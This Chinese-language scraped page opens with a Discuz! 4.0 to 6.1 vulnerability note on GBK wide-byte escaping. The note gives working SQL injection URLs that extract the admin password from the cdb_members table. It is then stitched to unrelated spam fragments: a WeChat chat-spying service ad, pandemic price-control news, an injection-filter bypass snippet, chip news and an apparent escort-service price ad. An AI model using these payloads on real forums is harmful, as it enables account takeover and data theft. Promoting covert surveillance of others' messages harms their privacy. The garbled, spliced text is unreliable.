影响版本: Discuz!4.0.0 Discuz!4.1.0 Discuz!5.0.0 Discuz!5.5.0 Discuz!6.0.0 Discuz!6.1.0 描述: Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质 量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑 由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误 提交一个 ' 转意成 \' 然后转成gbk的,\和'就变成两个字符了 '就可以成功的引入 测试 *** : 以下程序( *** )可能带有攻击性,仅供安全研究与教学之用.风险自负! if(defined('IN_DISCUZ')) { exit('Access Denied'); } define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/'); class Chinese { var $table = ''; var $iconv_enabled = false; var $unicode_table = array(); var $config = array ( 'SourceLang' => '', 'TargetLang' => '', 'GBtoUnicode_table' => 'gb-unicode.table', 'BIG5toUnicode_table' => 'big5-unicode.table', ); function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) { $this->config['SourceLang'] = $this->_lang($SourceLang); $this->config['TargetLang'] = $this->_lang($TargetLang); if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) { $this->iconv_enabled = true; } else { $this->iconv_enabled = false; $this->OpenTable(); } } function _lang($LangCode) { $LangCode = strtoupper($LangCode); if(substr($LangCode, 0, 2) == ‘GB’) { return ‘GBK’; } elseif(substr($LangCode, 0, 3) == ‘BIG’) { return ‘BIG5′; } elseif(substr($LangCode, 0, 3) == ‘UTF’) { return ‘UTF-8′; } elseif(substr($LangCode, 0, 3) == ‘UNI’) { return ‘UNICODE’; } } function _hex2bin($hexdata) { for($i=0; $i < strlen($hexdata); $i += 2) { $bindata .= chr(hexdec(substr($hexdata, $i, 2))); } return $bindata; }chinese.class.php (utf-8不能利用) searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit /space.php?username=%cf'%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,password,50,51,52,53,54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84%20from%20cdb_members%20where%20uid=1/* 直接放在url后面可以爆出id=1的用户密码,还可以自己根据需要更改,要注意一点的是,目标必须开了WAP,而且没有打上补丁,WAP浏览
如何监视另一方微信聊天(高科技远程控制偷窥微信记录),刚开始,让我们夸大其词一下!别看别人的东拉西扯记录,因为这会迫害别人的隐衷!若你要监管别人的朋友...
核酸检测收费将加强监督检查 新华社北京2月7日电(记者赵文君)加强核酸检测、防疫物资等价格收费监管;加强米面油、肉蛋奶、蔬菜、水果等生活必需品价格监测监管。记者7日从市场监管总局获悉,针对这...
下载到电脑后,运转装置程序。 1.3绕过SQL防注入体系 public class ResourceHandler : IHttpHandler { /// <su...
今天早上,华为公司举办新闻媒体沟通交流会,宣布公布了新一代旗舰CPU:麒麟950。 华为公司表明,麒麟950是第一个选用tsmc16nm FinFET plus加工工艺的SOC处理芯片,内嵌了四颗C...
那么,拨打电话的问题处理了,那些公司的“智能机器人”是怎么运转的呢?9、qwerty (↓ 5)灰盒 smart fuzzPowershell Empire和PSAttack都是不依赖于powersh...
来到深圳,假如必须商务得话,一定要来要我,由于我是商务的艺人经纪人,我能陪你寻找给你一定会令人满意的,“深圳商务”预定深圳高端模特价钱花费表4028米-8014米是规范一夜一次这一块,在深圳沒有我不会...